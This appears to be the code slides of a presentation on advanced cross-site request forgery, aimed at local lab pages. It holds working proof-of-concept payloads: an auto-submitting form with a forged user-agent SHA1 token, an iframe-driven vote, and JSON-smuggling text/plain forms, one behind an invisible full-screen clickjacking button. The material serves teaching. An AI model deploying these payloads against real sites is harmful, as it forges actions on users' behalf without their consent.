$token = sha1($_SERVER['HTTP_USER_AGENT']); if (isset($_POST['token'])) {
$token = sha1($_SERVER['HTTP_USER_AGENT']); if (isset($_POST['token'])) {
<html> <header> <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/sha1.js"></script> </header> <body onload="loaded();" > <iframe name="iframe"></iframe> <form name="frmCSRF" method="POST" action="http://localhost/advanced-csrf/leaking/index.php" target="iframe"> <input type="text" name="token" id="token" value="" /> <textarea name="msg" cols="15" rows="5">harharhar</textarea> </form> <script type="text/javascript"> function loaded() { document.getElementById('token').value = CryptoJS.SHA1(navigator.userAgent); document.frmCSRF.submit(); } </script> </body> </html>
<script type="text/javascript"> function loaded() { $("#ifr").contents().find("select option[value=banana]").attr("selected",true); $("#ifr").contents().find("form").submit(); } </script> <iframe onload="javascript:loaded()" id="ifr" src="./vote.php"></iframe>
{ "subscribe_to": "weekly_newsletter", "mail": "john@doe.com" }
<form method="POST" action="http://localhost/advanced-csrf/ex2-3/subscribe.php" enctype="text/plain"> <input type='text' name='{"subscribe_to":"weekly_newsletter","mail":"hon@doe.com", "ignore_me":"' value='"}' /> <input type="submit" value="send" /> </form>
{ 'subscribe_to': 'weekly_newsletter', 'mail': 'john@doe.com', 'ignore_me': '"}' }
<form method="POST" action="http://localhost/advanced-csrf/ex2-4/api.php" enctype="text/plain"> <input type='text' name='{"action":"reset-voting","value":"all", "ignore_me":"' value='"}' /> <input type='submit' value="submit" style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;" /> </form>
audience.ask(questions);
This presentation is licensed under the
Creative Commons Attribution 4.0 International
license.